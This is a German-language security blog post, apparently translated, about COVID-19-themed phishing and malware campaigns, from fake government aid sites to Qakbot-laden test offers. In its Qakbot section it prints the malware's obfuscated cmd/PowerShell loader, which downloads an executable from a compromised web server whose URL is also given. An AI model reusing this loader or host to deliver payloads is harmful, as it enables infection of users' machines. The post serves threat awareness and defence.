Angreifer nutzen weiterhin das COVID-19-Thema und schaffen immer mehr Bedrohungen für Benutzer, die sich für alles interessieren, was mit der Epidemie zu tun hat. In einem früheren Beitrag haben wir bereits darüber gesprochen, welche Arten von Malware nach dem Coronavirus aufgetreten sind, und heute werden wir über Social-Engineering-Techniken sprechen, auf die Benutzer in verschiedenen Ländern bereits gestoßen sind, auch in Russland. Allgemeine Trends und Beispiele - unter dem Schnitt.
Erinnern Sie sich noch an das letzte Mal, als wir darüber gesprochen haben, wie Menschen nicht nur über Coronavirus und den Verlauf der Epidemie lesen, sondern auch über finanzielle Unterstützungsmaßnahmen? Hier ist ein gutes Beispiel. Im Bundesland Nordrhein-Westfalen il NRW wurde ein merkwürdiger Phishing-Angriff entdeckt. Die Angreifer erstellten Kopien der Website des Wirtschaftsministeriums ( NRW-Wirtschaftsministerium)), wo jeder einen Antrag auf finanzielle Unterstützung stellen kann. Ein solches Programm existiert wirklich und es stellte sich heraus, dass es in den Händen von Betrügern liegt. Nachdem sie die persönlichen Daten ihrer Opfer erhalten hatten, stellten sie bereits auf der Website des Ministeriums einen Antrag, gaben jedoch andere Bankdaten an. Nach offiziellen Angaben wurden bis zur Bekanntgabe des Systems viertausend solcher gefälschten Anträge gestellt. Infolgedessen fielen 109 Millionen US-Dollar für betroffene Bürger in die Hände von Betrügern.
Möchten Sie einen kostenlosen Test für COVID-19?
Ein weiteres anschauliches Beispiel von corona Phishing wurde gefunden in E - Mail. Nachrichten haben die Aufmerksamkeit der Benutzer mit einem Vorschlag auf sich gezogen, kostenlose Tests auf Coronavirus-Infektionen durchzuführen. Im Anhang dieser Briefe befanden sich Instanzen von Trickbot / Qakbot / Qbot. Und als diejenigen, die ihre Gesundheit überprüfen wollten, anfingen, das angehängte Formular auszufüllen, wurde ein schädliches Skript auf den Computer heruntergeladen. Um eine Überprüfung durch die Sandbox-Methode zu vermeiden, begann das Skript erst nach einiger Zeit mit dem Laden des Hauptvirus, als die Sicherheitssysteme davon überzeugt waren, dass keine böswilligen Aktivitäten stattfanden.Es war auch einfach, die meisten Benutzer davon zu überzeugen, Makros zu aktivieren. Dazu wurde ein Standardtrick verwendet. Wenn Sie den Fragebogen ausfüllen möchten, müssen Sie zuerst Makros aktivieren. Dies bedeutet, dass Sie das VBA-Skript ausführen.
Wie Sie sehen können, ist das VBA-Skript speziell vor Virenschutzprogrammen maskiert.
Windows verfügt über eine Wartefunktion, wenn die Anwendung auf / T <Sekunden> wartet, bevor sie standardmäßig die Antwort „Ja“ akzeptiert. In unserem Fall hat das Skript 65 Sekunden gewartet, bevor temporäre Dateien gelöscht wurden: Während des Wartens wurde Malware heruntergeladen. Zu diesem Zweck wurde ein spezielles PowerShell-Skript gestartet:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Nach dem Dekodieren des Base64-Werts lädt das PowerShell-Skript die Backdoor auf dem zuvor gehackten Webserver aus Deutschland:http://automatischer-staubsauger.com/feature/777777.png
und speichert es unter dem Namen:C:\Users\Public\tmpdir\file1.exe
Der Ordner ‘C:\Users\Public\tmpdir’wird gelöscht, wenn die Datei 'tmps1.bat' ausgeführt wird, die den Befehl enthältcmd /c mkdir ""C:\Users\Public\tmpdir"".Gezielter Angriff auf Regierungsbehörden
Darüber hinaus berichteten FireEye-Analysten kürzlich über einen gezielten Angriff von APT32 auf die Regierungsstrukturen in Wuhan sowie auf das chinesische Ministerium für Notfallmanagement. Eine der verteilten RTFs enthielt einen Link zu einem Artikel der New York Times mit dem Titel Coronavirus Live Updates: China verfolgt Reisende aus Hubei . Beim Lesen wurde jedoch Malware heruntergeladen (FireEye-Analysten identifizierten die Instanz als METALJACK).Interessanterweise konnte zum Zeitpunkt des Nachweises keines der Antivirenprogramme diesen Fall nach Virustotal nachweisen.
Wenn offizielle Seiten "lügen"
Das hellste Beispiel für einen Phishing-Angriff fand neulich in Russland statt. Grund dafür war die Ernennung der lang erwarteten Zulage für Kinder im Alter von 3 bis 16 Jahren. Als am 12. Mai 2020 der Beginn der Annahme von Anträgen angekündigt wurde, eilten Millionen auf die Website der State Services, um die lang erwartete Hilfe zu erhalten, und brachten das Portal nicht schlechter als einen professionellen DDoS-Angriff zum Erliegen. Als der Präsident sagte, dass „die staatlichen Dienste den Antragsfluss nicht bewältigen könnten“, sprachen sie darüber, dass ein alternativer Standort für die Annahme von Anträgen bereits funktioniert habe.
Das Problem ist, dass mehrere Websites gleichzeitig verdient haben, und während eine, die echte auf posobie16.gosuslugi.ru, wirklich Anwendungen akzeptiert, sammeln Dutzende mehr persönliche Daten von vertrauenswürdigen Benutzern .Kollegen von HeartInform haben in der .ru-Zone etwa 30 neue betrügerische Domains gefunden. Infosecurity a Softline Company hat seit Anfang April über 70 ähnliche gefälschte Websites für öffentliche Dienste verfolgt. Ihre Schöpfer manipulieren bekannte Symbole und verwenden auch Kombinationen der Wörter gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie und so weiter.Agiotage und Social Engineering
Alle diese Beispiele bestätigen nur, dass Angreifer das Thema Coronavirus erfolgreich monetarisieren. Und je höher die soziale Spannung und je unklarer die Fragen sind, desto größer ist die Chance für Betrüger, wichtige Daten zu stehlen, Menschen zu zwingen, ihr Geld selbst zu geben oder einfach mehr Computer zu hacken.Und da die Pandemie potenziell unvorbereitete Menschen dazu veranlasst hat, in großer Zahl von zu Hause aus zu arbeiten, sind nicht nur persönliche, sondern auch Unternehmensdaten gefährdet. Beispielsweise waren kürzlich Benutzer von Microsoft 365 (ehemals Office 365) ebenfalls einem Phishing-Angriff ausgesetzt. In den Anhängen an Briefe erhielten die Menschen massiv „verpasste“ Sprachnachrichten. Tatsächlich handelte es sich bei den Dateien jedoch um eine HTML-Seite, die die Opfer des Angriffs an die gefälschte Microsoft 365-Anmeldeseite weiterleitete. Infolgedessen - Zugriffsverlust und Kompromittierung aller Daten aus dem Konto.